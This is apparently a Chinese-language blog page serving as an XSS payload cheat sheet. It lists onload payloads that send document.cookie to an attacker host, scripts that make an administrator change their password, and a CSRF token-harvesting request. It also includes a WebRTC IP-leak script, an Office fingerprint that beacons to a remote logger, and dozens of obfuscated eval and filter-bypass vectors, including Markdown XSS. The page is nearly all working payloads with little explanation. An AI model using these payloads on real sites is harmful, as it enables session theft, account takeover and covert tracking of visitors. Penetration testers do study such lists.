XSS
body标签
<body onload='load();'>
</body>
JS语句内调用
<script>
window.onload = ...;
</script>
常用方式
# 当前页面打开新页面
<body onload="window.location.href='http://xxx/?cookie=' + document.cookie"></body>
# 当前页面打开新页面
<body onload="document.location.href='http://xxx/?cookie=' + document.cookie"></body>
# 父页面打开新页面
<body onload="parent.location.href='http://xxx/?cookie=' + document.cookie"></body>
# 顶层页面打开新页面
<body onload="top.location.href='http://xxx/?cookie=' + document.cookie"></body>
# 当前页面打开新页面
<body onload="this.location.href='http://xxx/?cookie=' + document.cookie"></body>
# 当前页面打开新页面
<body onload="self.location.href='http://xxx/?cookie=' + document.cookie"></body>
<script>window.location.href='xxx' + document.cookie</script>
利用方法
拿cookie登录
令管理员自己修改密码
<script>window.location.href='http://127.0.0.1/api/change.php?p=dddddd';</script>
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>
XSS
payload
获取ip地址
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome
if(window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
}
//insert IP addresses into the page
getIPs(function(ip){
var li = document.createElement("li");
li.textContent = ip;
//local IPs
if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
// do something with PRIVATE IPs
//assume the rest are public IPs
else
// do something with PUBLIC IPs
});
获取浏览器信息
document.write('<P>'+navigator.appName+'</P>');
document.write('<P>'+navigator.appVersion+'</P>');
document.write('<P>'+navigator.platform+'</P>');
document.write('<P>'+navigator.userAgent+'</P>');
var plugins = navigator.plugins;
var mimeTypes = navigator.mimeTypes
document.write('<P>');
for (i=0;i<plugins.length;i++) {
var plugin = plugins[i];
document.write('<B>'+plugin.name+'</B><BR>');
document.write(plugin.filename+' - '+plugin.description+'<BR>');
for(j=0;j<plugin.length;j++) {
var mimetype = plugin[j];
document.write(mimetype.type);
if(mimetype.description) {
document.write(' : '+mimetype.description);
}
if(mimetype.suffixes) {
document.write(' - extentions: '+mimetype.suffixes);
}
document.write('<BR>');
}
}
document.write('</P>');
CSRF
function request(url, type, callback, send){
var oReq = new XMLHttpRequest();
oReq.open(type, url, true);
oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
oReq.onload = callback;
oReq.send(send);
};
function getListener () {
var el = document.createElement('div');
el.innerHTML = this.responseText;
request('csrf.php', 'POST', postListener, 'csrf_token=' + el.querySelector('input[name="csrf_token"]').value + '&update_profile=value');
};
function postListener(){
console.log(this.responseText)
};
request('csrf.php', 'GET', getListener);
获取office信息
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}
try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}
try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}
try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}
new Image().src = 'http://remote.com/log.php?office_version='+encodeURI(key);
绕过
replace
当replace第二个参数为函数时候,会将匹配到的字符串作为参数传进去,而不是进行替换
"1".replace(/1/, alert)
杂项方法
<svg xmlns="http://www.w3.org/20" onload="alert`1`"/>
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>
var fn=window[490837..toString(1<<5)];
fn(atob('YWxlcnQoMSk='));
</script>
<script>
var fn=window[String.fromCharCode(101,118,97,108)];
fn(atob('YWxlcnQoMSk='));
</script>
<script>
var fn=window[atob('ZXZhbA==')];
fn(atob('YWxlcnQoMSk='));
</script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script>
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>
<script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>
<script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script>
<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>
<script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script>
<script>Array.from`${eval}alert\`1\``</script>
<script>Array.from([1],alert)</script>
<script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u>
<videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script>
<script>x=new class extends Function{}('alert(1)'); x=new x;</script>
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>
<frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
img方法
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
eval方法
/***********************/
/* Encoded eval string */
/***********************/
<script>
var eval_b64 = 'ZXZhbA==';
var eval_charcode = 'String.fromCharCode(101,118,97,108)';
var eval_base32 = '490837..toString(1<<5)';
var eval_non_alpha1 = '(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]';
var eval_non_alpha2 = '(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]])';
</script>
/*********************/
/* Through functions */
/*********************/
<script>
var fn=window[atob('ZXZhbA==')];
fn(/*code to eval()/*);
</script>
<script>
var fn=window[String.fromCharCode(101,118,97,108)];
fn(/*code to eval()/*);
</script>
<script>
var fn=window[490837..toString(1<<5)];
fn(/*code to eval()/*);
</script>
/**********************************/
/* Straight through window object */
/**********************************/
<script>
window[atob('ZXZhbA==')](/*code to eval()*/)
</script>
<script>
window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
<script>
window[490837..toString(1<<5)](/*code to eval()*/)
</script>
<script>
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
<script>
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
/*************************/
/* Straight through this */
/*************************/
<script>
this[atob('ZXZhbA==')](/*code to eval()*/)
</script>
<script>
this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
<script>
this[490837..toString(1<<5)](/*code to eval()*/)
</script>
<script>
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
<script>
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
/****************/
/* regexp based */
/****************/
<script>
'e1v2a3l'.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })
</script>
/*********************************/
/* Other ways to execute strings */
/*********************************/
<script>
delete /* code to execute */
throw~delete~typeof~/* code to execute */
delete[a=/* function */]/delete a(/* params */)
var a = (new function(/* code to execute */))();
</script>
MarkdownXSS
[kevil](javascript:alert`1`)
![kevil](http://p1.qhmsg.com/dm/180_180_100/t01fc6662a4934b6649.jpg"onload="alert(1))
![kevil]("onerror="alert(1))
<svg/onload=alert(1)>
浙公网安备 33010602011771号